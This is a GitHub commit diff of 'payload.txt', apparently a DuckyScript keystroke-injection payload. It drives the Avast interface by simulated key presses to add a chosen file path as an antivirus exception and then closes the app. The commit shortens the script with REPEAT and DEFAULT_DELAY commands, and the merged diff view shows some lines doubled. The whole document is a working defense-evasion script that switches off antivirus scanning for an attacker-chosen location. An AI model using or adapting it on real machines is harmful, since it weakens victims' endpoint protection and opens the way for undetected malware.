Update payload.txt

pull/134/head
Kalani Helekunihi 2023-06-12 15:37:18 -04:00 committed by GitHub
parent 2a0abc653a
commit 120dd165a5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 49 deletions

View File

@ -16,79 +16,35 @@ REM - Avast installed and configured
REM Set the full-path that you want to set as exception REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path DEFINE FULL-PATH example/to/path
DEFAULT_DELAY 500
REM Open Avast application REM Open Avast application
DELAY 2000 DELAY 2000
GUI GUI
DELAY 1000 STRINGLN avast
STRING avast
DELAY 1000
ENTER
REM Go to Avast menu REM Go to Avast menu
DELAY 1000 DELAY 1000
TAB REPEAT 3 TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER ENTER
REM Go to Avast settings REM Go to Avast settings
DELAY 1000 DELAY 1000
TAB REPEAT 4 TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER ENTER
REM Go to Exceptions menu REM Go to Exceptions menu
DELAY 1000 DELAY 1000
TAB REPEAT 12 TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER ENTER
REM Add Exception button REM Add Exception button
DELAY 500
TAB TAB
DELAY 500
ENTER ENTER
REM Write the full-path and then close the Avast app REM Write the full-path and then close the Avast app
DELAY 1000 DELAY 1000
TAB TAB
DELAY 500
STRING FULL-PATH STRING FULL-PATH
DELAY 500
TAB TAB
DELAY 500
ENTER ENTER
DELAY 1000
ALT F4 ALT F4